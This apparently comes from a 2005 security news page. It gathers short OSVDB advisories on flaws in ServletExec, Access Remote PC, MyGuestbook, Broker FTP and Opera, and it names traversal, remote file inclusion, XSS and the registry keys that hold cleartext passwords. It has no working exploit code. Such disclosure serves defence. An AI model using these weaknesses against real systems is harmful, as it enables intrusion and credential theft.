Unify eWave ServletExec UploadServlet Unprivileged File Upload

Network Security News – Friday, July 08, 2005 Events

Unify eWave ServletExec UploadServlet Unprivileged File Upload

ServletExec contains a flaw that may allow a remote attacker to arbitrarily upload files. The problem is that the application does not restrict access to the 'com.unify.ewave.servletexec.UploadServlet' servlet. It is possible that the flaw may allow a remote attacker to create a HTML form and upload JSP files to the server and execute arbitrary commands resulting in a loss of integrity.. Read more at osvdb.org/469

Unify eWave ServletExec GET /servlet/ Request DoS

ServletExec contains a flaw that may allow a remote denial of service. The issue is triggered when issuing a specially crafted HTTP GET request containing the '/servlet/' string, which causes the servlet engine to crash resulting in a loss of availability.. Read more at osvdb.org/17769

Access Remote PC Registry Cleartext User Credential Disclosure

Access Remote PC contains a flaw that may lead to an unauthorized password exposure. It is possible to gain access to RPC Subscription Service passwords by reading the 'HKEY_LOCAL_MACHINE\Software\Access Remote PC\Server\Proxy\RPCNumber' and 'HKEY_LOCAL_MACHINE\Software\Access Remote PC\Server\Proxy\Password' registry keys, which store that passwords without using encryption.. Read more at osvdb.org/17749

Mark Kronsbein MyGuestbook form.inc.php3 lang Variable Remote File Inclusion

Mark Kronsbein MyGuestbook, contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to "form.inc.php3" not properly sanitizing user input supplied to the "lang" variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.. Read more at osvdb.org/17750

Broker FTP LIST Command Traversarl Arbitrary Directory Listing

Broker FTP server contains a flaw that allows a remote attacker to list and retrieve files outside of the FTP root directory. The issue is due to the server not properly sanitizing user input, specifically traversal style attacks (../../) supplied via the 'LIST' or 'DIR' FTP commands.. Read more at osvdb.org/17755

Broker FTP DELETE Command Traversarl Arbitrary File Deletion

Broker FTP server contains a flaw that allows a remote attacker to delete files outside of the ftp root directory. The issue is due to the server not properly sanitizing user input, specifically traversal style attacks (../../) supplied via the DELETE FTP command.. Read more at osvdb.org/455

Opera URL Redirection XSS

Opera contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the content of self generated temporary pages for displaying a redirection when the 'Automatic redirection' option is disabled. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.. Read more at osvdb.org/17580